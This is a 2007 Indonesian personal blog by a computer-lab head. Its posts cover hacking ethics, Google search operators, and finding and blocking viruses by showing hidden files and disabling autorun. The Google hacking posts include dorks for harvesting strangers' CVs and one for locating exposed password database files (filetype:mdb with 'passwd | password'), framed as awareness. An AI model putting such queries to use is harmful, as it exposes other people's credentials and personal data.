image yang jelek, hal ini tercipta karena banyaknya film hollywood yang juga salah dalam memberi arti Hacker. Hacker didalam film-film lebih bermakna sebagai penghacur sistem informasi sebagai contoh adalah film Net (1995) atau film Take Down (1999).Film tersebut mengangkat tema hacker untuk menyebut Cracker. Pada awalnya saya sama berpikir Hacker itu adalah craker tetapi beruntung berkat sebuah artikel pikiran itu sedikit demi sedikit berubah. Saat ini saya pribadi setuju dengan apa yang dikatakan Harianto Ruslim. Bagi saya Hacker adalah orang yang mempunyai keahlian melakukan tindakan Hacking yang tujuannya membangun dan memperkuat Sistem Security dari organisasi maupun personal. Hal ini sama dengan apa yang tulis Harianto Ruslim dalam bukunya Hack. Jadi bagi temen-teman yang tertarik ingin menjadi Hacker, bacalah buku Hack dan carilah artikel How To Be Became A Hacker.

Contoh Aplikasi Hacking

2007-11-30T16:50:00.000-08:00

Hari ini kita belajar bagaimana syntax itu dapat mempercepat pencariaan sekaligus menjadi tool hacking. Google dapat menampilkan banyak informasi yang sifatnya sangat rahasia dan confidential. berikut ini adalah beberapa contoh aplikasi pengguanaan google untuk mendapatkan informasi yang sifatnya rahasia. Tujuan saya menulis ini supaya banyak orang semakin sadar dan dapat melakukan proteksi terhadap data-data mereka. Pada kesempataan ini kita mencoba mendapatkan resume orang lain melalui Internet. Dengan Google kita dapat mendapatkan ratusan bahkan ribuan cv dari seluruh dunia dalam berbagai macam file. Untuk kali ini kita akan mencoba keyword seperti ini resume cv filetype:doc hasilnya akan menampilkan semua link ke file doc yang berisikan kata resume, hebat bukan. Apabila kita lebih spesifik lagi misalnya kita menulis keyword yang seperti ini resume cv site:brinkster.com maka akan terlihat banyak sekali link yang ada dihosting Brinkster, hal ini disebabkan brinkster merupakan salah satu situs yang menawarkan hosting situs gratis. Bagaimana kalau saya inginkan menampilkan file resume itu yang dalam bentuk pdf file. Mudah sekali kita tinggal menambahkan resume cv filetype:pdf site brinkster.com tentu saja google akan menampilkan Hasil semu file resume dalam bentuk file pdf yang ada pada situs brinkster.com
Mungkin anda masih bingung dimana letak kesalahannya jika tulisan ini jatuh keorang yang tidak bertanggung jawab. Seperti kata saya diatas Google dapat menampilkan banyak informasi yang sifatnya sangat rahasia dan confidential. Apa jangan-jangan dengan google orang dapat memberikan informasi tentang database ? Yup Google bisa membantu kita melakukan aktivitas mendapatkan file yang berisikan password dan data penting lainnya yang disimpan dalam database acces, tetapi tentu saja tidaklah semudah membalikan telapak tangan karena kita sendiri masih harus melakukan verifikasi dari hasil search google tersebut satu per satu. Sayangnya saya tidak akan membahas bagaimana mendapatkan file database tetapi kalau memang anda tertarik anda dapat mempelajarinya dari buku seni hacking I dan Hack terbitan jasakom. Tugas saya hanyalah membuka pikiraan pembaca bahayanya google Hacking
Semoga ini dapat manambah wawasan anda

Google Hacking

2007-11-29T18:50:00.000-08:00

Yup, akhir minggu ini kita mempelajari suatu bab yang sangat menarik , Kenapa ? Karena kita akan mempelajari hacking dengan tidak menggunakan tools, cukup dengan web browser saja. Harapan saya bukan mengharapkan anda semua menjadi Hacker , Cracker atau script kiddy, tujuan dari belajar Google Hacking ini anda dibantu menjadi lebih mudah dalam mencari data yang dibutuhkan. Sepeti yang kita semua tahu google merupakan search engine yang paling populer dan kepopulerannya mengalahkan search engine sebelumnya yaitu yahoo.com hal ini disebabkan karena google mempunyai kemampuan yang handal, hal ini dikarenakan google dapat menerima command sebagai input dan menghasilkan hasil yang sangat luar biasa.
Oleh karena itulah saya menulis artikel ini, karena dengan google kita bisa mendapatkan informasi apapun tidak kecuali alamat email siapapun. Walaupun saya sebagai penulis tahu dengan google banyak digunakan oleh para hacker, cracker ataupun script kiddy untuk mendapatkan informasi-informasi penting yang tidak mungkin mereka dapatkan lewat search yang umum dengan hanya menggunakan 'KeyWord'. Bagaimana kalau google hacking digunakan untuk jalan yang benar, maka dapat dipastikan bahwa kita akan mendapatkan informasi yang lebih akurat dan tidak membuang banyak waktu.
Berikut ini saya lampirkan spesial command yang bisa digunakan dalam melakukan searching diantaranya :
Intitle: Syntax ini memungkinkan kita melakukan search berdasarkan Title atau Judul Web
Inurl : Syntax ini membantu kita membatasi pencariaan pada situs tertentu saja
Site : Syntax ini digunakan untuk membatasi percarian terhadap site atau domain tertentu
Filetype:Syntax ini membantu kita untuk membatasi pencarian berdasarkan file dengan ekstensi tertentu
link:Syntax ini menampilkan halaman-halaman web yang mempunyai link ke situs tertentu
related: Syntax ini menampilkan hasil yang mirip dengan halaman web yang dispssifikasikan
intext: Syntax ini akan melakukan pencarian terhadap kata-kata tertentu sesuai dengan keyword
Phonebook: Syntax ini membantu percarian terhadap orang atau alamat
Bosen juga yah bacanya, yah sudah saya akan memberikan contoh penggunanya tapi tidak semuanya contoh : phonebook:lisa+Pontianak, o ya sebelum lupa google hacking bisa digabung dengan operasi pembanding ( or, xor, not, xnor) salah satu contohnya filetype:mdb inrul: "passwd | password" yang artinya cari passwd atau password, he..he.. Sekarang baru tahu khan betapa bahayanya jika google Hacking jatuh ketangan yang salah. So jadikan Google Hacking sebagai ilmu pengetahuan. Besok saya akan menulis contoh aplikasi google hacking tetapi tentu saja situsnya adalah fiksi belaka. Ini untuk kemajuan ilmu pengetahuan saja bukan untuk menjadi Hacker, cracker atau malah script kiddy.
Artikel ini saya tulis setelah saya membaca buku Hack Konsep dan pencegahan karangan Harianto Ruslim.Cen Terbitan Jasakom dan Buku Uncensored Seri Teknik Hacking I karangan S'to Terbitan Jasakom. Banyak baca membuat kita jauh dari kebodohan seperti yang dikatakan artis kita di iklan ayo baca .
Jadilah seorang yang mempunyai keahlian mengutak-atik komputer yang mempunyai tujuan untuk membangun dan memperkuat sistem security.

See Your Virus

2007-11-29T17:49:00.000-08:00

Hari ini saya ingin menulis bagaimana melihat virus tanpa Antivirus, kalo kita kemarin sudah dapat mematikan virus agar tidak menyebar ke komputer kita, hari ini kita belajar bagaimana kita dapat melihat virus tersebut cobalah langkah2 dibawah ini
1.Bukalah My computer
2.Pilih Tool
3.Selanjutnya Pilih Folder Option
4.Pilih tab yang View
5.Pilih Show Hidden files and folder
6.Hapus centangan pada Hide extensions for known file types
7.Hapus centangan pada Hide Protected Operating System File (Recommended)
Maka anda akan melihat seluruh data yang sengaja atau tidak sengaja di hide baik itu file system maupun virus yang sengaja dihide, Kalu sudah kelihatan virusnya tinggal anda buang dengan cara Shif + Delete. Mudah bukan, Kalau yang mau komentar silakan saja.Well saya sudah memenuhi janji saya. Besok akan saya tulis hal-hal yang baru sehingga kita menjadi lebih cerdas dalam menggunakan komputer dan memaksimalkan apa yang ada pada komputer kita
Dengan ini saya tutup masalah menangani virus tanpa anti virus, silakan email saya jika anda ingin berkonsultasi dengan saya silakan mengirim email ke willy@bundamulia.ac.id semoga tulisan ini berguna bagi pembaca

Autorun dan autoplay

2007-11-28T15:50:00.000-08:00

He..He... Saya menepati janji saya akan memberitahukan bagaimana mematikan autorun yang salah fungsi memeperlebar celah masuknya virus ke dalam komputer. Banyak orang tidak sadar bahwa autorun mempunyai fungsi yang disebutkan diatas tadi. Masalahnya kalau kita sudah tahu salah satu pintu virus masuk ke komputer melalui autorun, maka dapatkah autorun itu dimatikan sehingga virus tidak bisa masuk ? Pertanyaan yang bagus, Tentu saja bisa sayangnya tidak banyak dari pengguna komputer yang mengetahuinya oleh karena itu saya mencoba menuliskannya buat pembaca

Cara mematikan Fungsi auto run dan autoplay adalah sebagai berikut
1. Klik menu start (Cari aplikasi Run)
2. Pada Tab Open ketik gpedit.msc
3. Akan muncul jendela Group Policy

4. Klik Administrative template yang terdapat dibawah computer Figuration

5. Klik ganda folder system yang terdapat pada jendela disampingnya

6. Carilah tulisan turn off auto play, kemudian klik ganda

7. Akan muncul jendela popup turn of auto play properties, pilih enabled

8. Klik menu pull down yang terdapat pada tab turr off auto play on kemudian pilih all driver

9. Klik ok.

10. Lakukan hal yang sama pada menu administrasi templates yang terdapat dibawah user configuration

he...he... kayanya gambarnya engga keluar yah, untuk teman-teman yang butuh penjelasan dengan gambar dapat menghubungi willy@bundamulia.ac.id, nanti saya kirim apa yang saya tulis disini dengan gambarnya. Well itu yang dapat saya bagikan hari ini, ilmu ini saya dapatkan dari membaca Buku XXX Windows karangan Eri Bowo terbitan Jasakom dan sebuah ebook hacking windows XP karya Steve Sinchak.Selamat mencoba

Virus

2007-11-27T17:32:00.000-08:00

Virus adalah musuh bagi semua pengguna komputer, lalu bagaimana kita membasmi virus tersebut ? Tentu saja dengan Antivirus bukan, Antivirus adalah sebuah software yang sangat banyak digunakan orang untuk membasmi virus, tapi tahukan anda bahwa antivirus juga bisa terserang virus. Kembali kepada definisi diatas bahwa antivirus adalah software yang digunakan untuk membasmi virus jadi tidak menutup kemungkinan bahwa antivirus sendiri bisa terserang virus. Dalam beberapa kasus saya sering bertemu dengan kasus yang seperti ini

A : ”Game lo bagus tuh minta donk, Flashdisk lo bersih kan”

B :”Bersih dong, khan tiap hari gue scan pake *********”

(Sensor Tidak untuk menjelekkan Antivirus)

Ketika Flashdisk dikembalikan

A : “Sialan lo katanya bersih, komputer gue terserang virus tuh dari Flashdisk loe”

B : “Masa sih padahal udah gue update loh “

Ini potongan dari cerita yang sering kita jumpai dalam kehidupan nyata bukan, sering kali pengguna komputer menaruh kepercayaan yang sangat besar terhadap antivirus dan berharap antivirus dapat menyelesaikan segala masalah dengan Virus. Ternyata tidaklah demikian adanya lalu apakah anda solusi yang lebih baik atau kita hanya pasrah ketika virus menyerang. Kalau kita bisa mengetahui lebih awal mungkin kita dapat menyelamatkan komputer kita. Dengan cara apa kita dapat membuat virus itu agar tidak menyerang komputer kita, kalau saya sebagai penulis tidak menyarankan software karena akan ada kemungkinan yang sama seperti kasus diatas. Bagi saya dengan mematikan autorun kita dapat mencegah masuknya virus kedalam komputer kita hal ini sudah saya lakukan selama 1 tahun hingga saat ini belom bermasalah dengan virus.

Bagaimana mematikan autorun dan ,melihat virus yang menyerang komputer saya akan tulis besok. Hari ini saya hanya ingin kita mempunyai wawasan yang baru tentang cara membasmi Virus tanpa Software. Semoga tulisan ini dapat membuka wawasan anda tentang sebuah teknologi yang baru dalam menghadapi virus dan teruslah membuka blog saya setiap hari. Saya akan menulis apa yang saya tahu guna untuk mencerdaskan kita semua mengenai komputer dan segala permasalahannya.

Orang yang merasa dirinya paling hebat,

Adalah orang yang paling tidak hebat

Karena orang hebat adalah orang yang terus belajar

Tanpa memikirkan sanjungan orang dan pengakuan orang

www.divinikids.com

2007-11-27T03:48:00.001-08:00

Banyak orang mempertanyakan kemampuan anak bangsa dalam menciptakan game. Beberapa hari yang lalu aku mencoba beberapa artikel yang berhubungan dengan tugas yang harus dikumpulkan. Dalam pencarian itu saya menemukan situs yang unik, www.divinikids.com didalam pikiran saya pasti ini situs luar. Ternyata saya salah ini adalah situs anak bangsa. Satu situs dimana terdapat beberapa game yang merupakan buatan anak bangsa. Dengan motto banga buatan Indonesia mereka ingin menunjukkan keberadaan mereka. Mungkin sebagian pembaca juga belom mengetahuinya. Menurut saya keberadaan mereka populer, salah satru buktinya mereka pernah masuk TV, kembali lagi mungkin sebagian pembaca juga belom pernah masuk TV. Saya mencoba mendownload beberapa game, yang menurut saya cukup menarik perhatian saya diantaranya Magical Cangkul Tournament, Dadu Master SE, Love Journey, Misteri Penghuni Rumah Tua, dan Kaguya. Salah satu alasan saya mendownload semua game tersebut adalah masalah Karakter yang mereka. Karakter yang mereka gunakan adalah photo dari beberapa anak-anak kampus, yang makin membuat saya berpikir bahwa mereka memang serius ingin membuat game yang bagus untuk mengharumkan nama bangsa ini.

Sayangnya tidak banyak orang yang mengetahui bahwa anak bangsa ini, mampu membuat game yang bagus. Saya sendiri merasa senang dan cukup terhibur dengan game-game yang sudah saya download. Saya merasa cukup bangga dengan produk game buatan bangsa ini. Dan saya percaya bahwa anak-anak bangsa dapat membuat game yang akan mengharumkan nama Bangsa. Salah satu cara kita mendukung meraka dengan jadi pemain game yang mereka buat. Saran saya buat teman-teman yang membaca tulisan saya ini cobalah game-game anak bangsa beri komentar yang membangun, supaya meraka ( Pembuat-Pembuat Game Indonesia ) terus berkarya, semoga mereka dapat mengharumkan nama bangsa ini dengan apa yang mereka buat ( Game ). Moga-moga saja apa yang mereka buat ( Game ) bukan saja dimainkan anak bangsa tetapi juga dimainkan anak diluar Indonesia dan disukai. Harapan saya kepada temen-teman yang lain semoga ini dapat menjadi contoh yang baik sehingga kita terus berkarya dan mengembangkan kreativitas kita.

Majulah Anak-anak bangsa harumkanlah bangsa ini dengan karyamu dan kreativitasmu

2007-11-26T16:04:00.000-08:00

Nama ku Willy, Lengkapnya Jong Willy Tambayong. Saat ini umurku 29 tahun dam aku masih kuliah di STMIK JAYAKARTA. Adapun nama lain yang saya sering gunakan adalah vbbego ( Jangan Ditanya Kenapa Saya memilih nama itu ). Aku sendiri sudah bekerja di Universitas Bunda Mulia Sebagai Kepala Lab Komputer. Aku tipe orang yang senang belajar sesuatu yang baru tapi sayangnya aku juga seorang yang gampang sekali mengalami kebosanan. Aku mengenal komputer sejak aku SMP ( Kelas 1) itupun dikarenakan adanya pelajaran komputer disekolah. Pada waktu sekolah aku tidak minat mengembangkan diri di dunia komputer jadi hari-hari komputer yang dibelikan orang tuaku digunakan untuk main game oleh aku dan kakakku. Pada saat aku bekerja di Universitas Bunda Mulia aku baru banyak belajar tentang ilmu komputer dari software maupun hardware.

Kalau diingat-ingat sudah banyak software juga sih yang aku pelajari diantaranya Basic , Pascal , Visual Basic , Delphi , Oracle , PHP dan yang sekarang lagi menarik minatku adalah C ++. Selain aku mempelajari Bahasa-Bahasa Programing aku juga banyak belajar tentang jaringan walaupun tidak tahu teorinya. Hal itulah yang menjadi alasan kenapa aku kuliah di STMIK JAYAKARTA. Dengan kuliah aku berharap aku engga cuma bisa praktek tetapi ngerti juga teorinya, Aku sangat ingin berterima kasih buat Jocki Hendri yang telah mengajarkan Bahasa Basic yang akhirnya memacu aku jadi ingin belajar ilmu komputer lebih dan lebih lagi. Jocki Hendri adalah mahasiswa Bunda Mulia angkatan 2002.

Akhirnya aku juga bingung apalagi yang aku harus tulis, jadi aku sudahin saja perkenalan ini, Selamat Menikmati Blog Saya ini yah